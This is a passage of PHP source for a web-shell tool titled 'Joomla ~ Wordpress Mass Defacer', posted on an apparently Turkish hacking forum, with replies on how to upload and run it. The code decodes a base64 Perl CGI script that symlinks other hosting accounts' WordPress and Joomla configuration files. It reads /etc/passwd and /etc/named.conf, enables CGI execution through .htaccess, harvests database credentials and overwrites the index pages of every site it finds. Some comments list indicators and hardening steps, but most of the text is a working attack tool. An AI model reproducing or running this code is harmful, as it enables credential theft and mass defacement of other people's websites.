    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
           NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW​1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
           h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltb​GluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
           G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5r​KCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
           YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2N​hbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
           kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQ​pmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
           B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    // Staging directory, executable script and the .htaccess that lets the web
    // server run it.
    mkdir('plsym',0777);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    // One HTTP request to the script triggers it; the script file is removed
    // right afterwards, so only its by-products remain.
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    // The directory index of plsym/ is parsed to find the collected entries.
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i = 1;
    foreach($match[1] as $m)    
    {
        // Entry names have the form <account>##<kind>.txt.
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        // 'dbprefix' in the file marks it as a Joomla configuration.
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        // 'DB_NAME' in the file marks it as a WordPress configuration.
        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

/**
 * Mode 3: same flow as mode 2, except that the account list comes from the
 * request instead of a file on the server.
 *
 * The POST field 'man_data' is written verbatim to `plsym/data.txt` before the
 * dropped CGI script is invoked.
 * NOTE(review): the embedded base64 value differs from the one in mode 2 and
 * presumably reads data.txt - confirm by decoding in an isolated analysis
 * environment.
 *
 * Artefacts created next to the script (indicators to search for):
 *  - `plsym/` (mode 0777), `plsym/data.txt`, `plsym/.htaccess` mapping `.cc` to
 *    `cgi-script`, and a short-lived `plsym/plsym.cc` (mode 0755),
 *  - entries in `plsym/` whose names contain `##joomla.txt` or `##wordpress.txt`,
 *  - `defaced.html`, an append-only list of affected URLs.
 *
 * Hardening that removes the preconditions is the same as for mode 2:
 * `AllowOverride` set so account-level .htaccess files cannot enable `ExecCGI`
 * or add handlers, and configuration files not readable by other accounts.
 *
 * @param string $def_url URL whose body is fetched and url-encoded as replacement content.
 * @return void Progress is echoed as an HTML table.
 */
function exec_mode_3($def_url) {
    
    // Domain enumeration: zone names are taken from the DNS server configuration.
    $domains = @file_get_contents("/etc/named.conf");
    @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
    $out = array_unique($out[1]);
    $num = count($out);
    print("Total domains: $num<br><br />");
    
    $def = file_get_contents($def_url);
    $def = urlencode($def);
       
    $output = fopen('defaced.html', 'a+');
    $defaced = '';
    $count1 = 0;
    $count2 = 0;
    echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    $j = 1;
    // Account name -> domain, derived from the owner of /etc/valiases/<domain>.
    $map = array();
    foreach($out as $d) {
        $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        $map[$info['name']] = $d;
    }
    // Embedded base64 value written to disk as the CGI script below.
    $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
           kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgIC​BzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
           VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogI​CAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
           3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAg​ICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
           cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCc​pOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
           MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID​0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
           R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
    // Staging directory; request-supplied data is written to disk unchanged.
    mkdir('plsym',0777);
    file_put_contents('plsym/data.txt', $_POST['man_data']);
    file_put_contents('plsym/plsym.cc', base64_decode($dt));
    chmod('plsym/plsym.cc', 0755);
    $wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    $fp = @fopen ('plsym/.htaccess','w');
    fwrite($fp, $wr);
    fclose($fp);
    // One HTTP request to the script triggers it; the script file is removed
    // right afterwards, so only its by-products remain.
    $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    unlink('plsym/plsym.cc');
    // The directory index of plsym/ is parsed to find the collected entries.
    $data = file_get_contents($url);
    preg_match_all('/<a href="(.+)">/', $data, $match);
    unset($match[1][0]);
    $i=1;
    foreach($match[1] as $m)    
    {
        // Entry names have the form <account>##<kind>.txt.
        $mz = explode('##',urldecode($m));
        $config01 = '';
        $config02 = '';
        if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
        }
        if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
        }
        $domain = $map[$mz[0]];
        $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
        
        // 'dbprefix' in the file marks it as a Joomla configuration.
        if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }

        // 'DB_NAME' in the file marks it as a WordPress configuration.
        if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
// Page shell and request dispatch.
//
// Detection notes:
//  - The <title>, heading and footer strings emitted below are stable content
//    signatures for file-system and web-shell scanners.
//  - The page loads a font, background images and an icon from third-party
//    hosts, so opening it produces outbound requests visible in proxy or DNS logs.
//  - No authentication check is visible in this listing before the dispatch at
//    the bottom; links elsewhere reference a 'pass' query parameter. Finding
//    this file on a shared server means treating every hosted account as exposed.
// NOTE(review): the `********` tokens in the inline script are masked in the
// posted listing; they are kept exactly as published.
echo '<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background: 
url("https://d33ds.co/img/bg3.png") repeat , 
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right, 
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
 </style>
<script type="text/javascript">
function change() {
if(********.getElementById(\'rcd\').checked == true) {
********.getElementById(\'tra\').style.display = \'\';
} else {
********.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
********.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&copy; K2ll33d&nbsp;&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
// The selection form is shown only when none of the action parameters is
// present. It also reports whether /etc/named.conf and /etc/passwd are readable
// by the PHP process, which is itself a quick indicator of how exposed the host is.
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>';
    }
// Request dispatch: 'defpage' (the URL of the replacement page) and 'mode' are
// taken straight from the request. Web-server logs showing a POST to this file
// with form_action=1 mark the time a run was started.
$milaf_el_index = $_POST['defpage'];
    if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
    echo '</body>
</html>';




04-07-2013 15:15
#2
Konsol üzerinden mi çalıştıracağız?
11-08-2015 15:25
#3
Bunu nasıl yapacağız? Yardımcı olur musunuz?
25-12-2015 17:32
#4
Ana Dizine upload edip hacklediğin sitenin yanına yazcan

www.Kırdğımsite/shell.php
25-12-2015 18:15
#5
Alıntı:
SlayeRHackeR´isimli üyeden Alıntı Mesajı göster
Nasıl Yapıcaz Bunu Yardımcı Olurmusunuz
Konuyu hortlatmaya hiç gerek yok. 2013'te yazılmış ve anlamsız bir başlık.
Arkadaş shell'den bahsetmek istemiş... ama forumda bundan çok daha iyi içerikler bulabilirsiniz.
